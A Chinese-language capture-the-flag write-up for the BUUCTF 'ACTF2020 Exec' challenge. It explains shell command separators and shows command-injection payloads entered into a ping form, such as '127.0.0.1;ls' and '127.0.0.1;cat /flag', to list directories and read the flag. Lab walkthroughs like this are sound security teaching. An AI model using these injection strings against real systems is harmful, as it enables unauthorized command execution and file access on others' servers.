【BUUCTF】[ACTF2020 新生赛]Exec 1

这是一道命令注入题

知识点
1、命令注入我们要防备其对于一些符号的过滤导致我们不能成功注入,所以我们要多了解一些符号。
2、;直接分号分隔
管道符:作用和&一样。前面和后面命令都要执行,无论前面真假
3、| 按位或
作用是直接执行|后面的语句
4、|| 逻辑或
作用是如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句
5、& 按位与
&前面和后面命令都要执行,无论前面真假
6、&& 逻辑与
如果前面为假,后面的命令就不执行,如果前面为真则再执行后面命令,这样两条命令都会被执行

1、进入网站
【BUUCTF】[ACTF2020 新生赛]Exec 1_第1张图片
2、尝试让服务器ping自身,可以ping通
【BUUCTF】[ACTF2020 新生赛]Exec 1_第2张图片
3、尝试在ping命令之后注入其它命令
127.0.0.1;ls
【BUUCTF】[ACTF2020 新生赛]Exec 1_第3张图片
127.0.0.1;ls …/
【BUUCTF】[ACTF2020 新生赛]Exec 1_第4张图片
127.0.0.1;ls …/…/
【BUUCTF】[ACTF2020 新生赛]Exec 1_第5张图片
127.0.0.1;ls …/…/…/
发现flag,并再次尝试发现这里是根目录
【BUUCTF】[ACTF2020 新生赛]Exec 1_第6张图片
4、cat命令获得flag
127.0.0.1;cat /flag
【BUUCTF】[ACTF2020 新生赛]Exec 1_第7张图片

你可能感兴趣的:(BUUCTF之Web,ctf,远程命令,BUUCTF,逻辑运算)